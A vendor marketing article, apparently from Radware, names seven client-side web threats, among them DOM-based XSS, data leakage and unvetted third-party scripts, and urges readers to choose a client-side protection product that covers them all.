The Client-Side Seven: Make Sure Your Security Solution Addresses Them All
It is not uncommon for browser-side security to receive limited attention from IT teams when there are so many types of cyberattacks to protect against. This is due to cybersecurity fatigue among cyber-security professionals who are battling a constantly growing threat landscape. It is also mainly because historically, server-side attacks have been more common and the primary focus of attackers, as well as cyber security officers and web application firewall vendors. However, the application architecture and environment have changed in recent years, and the application’s perimeter is no longer easy to define. Not only are applications scattered across multiple environments, but they also rely on dozens of connections to third-party services that generate much of the application content on the browser side. This is what we call the application supply chain, where more malicious actors are looking to exploit these blind spots and unmonitored areas for their gain.
If client-side protection is not a major part of your organization’s security posture, it is a mistake for which you will eventually pay the price.
Ensure your application protection solution covers you against these seven common client-side threats:
1. Broken Access Control
When it comes to the client side, broken access control refers to malicious JavaScript exfiltrating sensitive data, such as login credentials or cached app data on the client side. It can also include manipulation of the DOM (Document Object Model) to gain access to client-side data. A designated client-side protection tool would protect against both.
2. DOM-based XSS Attacks
A DOM-based XSS (cross-site scripting) vulnerability means attackers can insert malicious JavaScript payloads onto an organization’s web page via its DOM (Direct Object Model) environment. It ultimately allows threat actors to take over users’ accounts. These types of attacks are difficult to detect on the server side, which is why you must ensure your client-side protection solution has a way to address them.
3. Data Leakage
Data leakage is as ominous as it sounds. It’s when data leaks out of the organization to unauthorized destinations and falls into the hands of malicious actors. Leaked data (PII that’s leaked or stolen by a malicious actor) can also be used later by hackers to access users’ accounts and take control of them. It can result in breaches, identity theft, credential stuffing, ransomware, and more. Your client-side protection solution needs to be able to block data from being transferred through the browser side of your applications to unknown destinations or known destinations with illegitimate parameters.
4. No 3rd-party Origin Control
Origin control allows cybersecurity professionals to restrict certain resources or assets by looking at their origin and comparing them to the origin of third-party libraries. Lack of proper origin control poses a higher risk of unknown and uncontrolled third-party code accessing data in the application. A client-side protection solution worth its weight needs to automatically uncover 3rd-party services, provide detailed activity tracking, and block unvetted origins to ensure that only the right third-party code has appropriate access to the application network.
5. JavaScript Tracking
Being able to track JavaScript is critically important if you have a website or application that is interactive (who does not?). There is an array of things that can go sideways. For instance, developers use libraries and third-party tools that can be a breeding ground for JavaScript vulnerabilities. Here’s the thing: a lot of third-party tools are created by smaller, independent developers or companies that often don’t have the time or resources to monitor and update their code on a regular basis. If your client-side protection solution cannot identify code-level JavaScript changes used on the client side, you will not know that there is malicious intent until it’s too late.
6. Client-Side Data Storage
A lot of sensitive end-user data can be stored on the client side, in LocalStorage, browser cache, as well as transient storage like JavaScript variables in a data layer. It’s necessary to ensure your client-side protection solution is advanced enough to protect against data theft and restrict the type of data that can be accessed and shared by vendors. This is also important for organizations that have data security compliance requirements, such as GDPR (General Data Protection Regulation). Client-side browser monitoring is important to ensure data and content are only exchanged or shared with predetermined domains.
7. No Standard Browser Security Controls
Attackers are opportunists; they are looking for weak security configurations and poor security controls. Unfortunately, not all browsers adhere to the same security standards and have all the common standards-based security controls built into them, such as iframe sandboxes, subresource integrity, and others. Make sure the client-side protection solution you decide on can detect and prevent digital trackers and pixels across your web properties.
Client-Side Protection
Today’s applications load on average from 20-25 third-party scripts during each user experience (UX). That alone should strike a chord and point out why client-side protection cannot be pushed to the back burner. It must be a part of your overall security posture. Ensuring the Client-Side Seven are part of it is as important as every other security measure you have implemented.
If you would like more information about our industry-leading Client-Side Protection Solution, reach out to Radware’s cybersecurity professionals here. We would love to hear from you.
